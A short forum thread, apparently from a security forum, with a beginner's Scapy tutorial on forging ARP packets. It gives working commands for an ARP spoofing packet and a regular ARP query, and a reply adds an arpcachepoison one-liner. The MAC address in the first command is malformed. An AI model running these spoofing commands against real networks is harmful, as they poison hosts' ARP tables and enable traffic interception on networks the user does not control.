Results 1 to 3 of 3

Thread: Scapy Tutorial - Part 1 - ARP

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    1

    Default Scapy Tutorial - Part 1 - ARP

    Hi guys,
    Since i CANT post this stuff in normal tutorial area (just subscribed), i guess ill post this right here.
    I downloaded a great new tool called Scapy , wich permit packet forging under linux .
    I didnt see much information and or tutorial about this, so i decided to write one myself.
    To FULLY undertsand this tuto, it would be better to have a basic conception of OSI layers.

    In this part of the toturial, we will cover (a bit) the ARP protocol.
    -------------
    ARP spoofing:
    --------------
    an arp-spoofing packet can be created with the following command:
    "Ether(dst='00:15:F20:46:40')/ARP(hwsrc='00:11:22:33:44:55', pdst='192.168.3.95', psrc='192.168.3.66', op=1)"
    Where:
    dst of Ether is only layer 2 related : ARP dont give a shit of that parameter
    hwsrc of ARP is the MAC you want to be in the remote arp table
    pdst of ARP is the IP (the real one!) of the remote machine in wich u want to infect the ARP table
    psrc of ARP is the IP (fake) of you want to be in the remote arp table

    to send the packet, please use the iface="ethX" option with the command SENDP (layer2)
    ex: sendp(arp_spoof,iface="eth0")

    A packet named 'arp_spoof' will already be instanciated from the session file.

    ARP Query(regular):
    --------------
    an arp query ("who-has") packet can be created with the following command:
    "ARP(pdst='192.168.3.95', psrc='192.168.3.1', op=1)"
    Where:
    pdst=The IP you want the MAC address from
    psrc=If you want to receive the answer, while NOT being in promiscious mode.
    BEWARE: Not setting a real IP will poison the ARP table of the remote computer, which is not THAT bad because the IP doesnt exist, but still...
    to send the packet, use a layer 3 sending function , like:
    sr(ARP(pdst='192.168.3.95', psrc='192.168.3.1', op=1))

    A packet named 'arp_query' should already be instanciated from the session file

  2. #2

    Default

    nice tutorial.. one word of advice:

    That is *not* a tutorial. That is explanation of arp spoofing that can be found literally everywhere.

    I would like to see a tutorial made by you, for editing the arp packet manually and sending it over the network... that will teach yourself first, and the others, possibly, second.

    Nice trying to help, though - keep the spirit up.

  3. #3
    Member
    Join Date
    Jun 2007
    Posts
    218

    Default

    For arp spoofing you can also use

    arpcachepoison(target_IP, victim_IP, interval=5)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •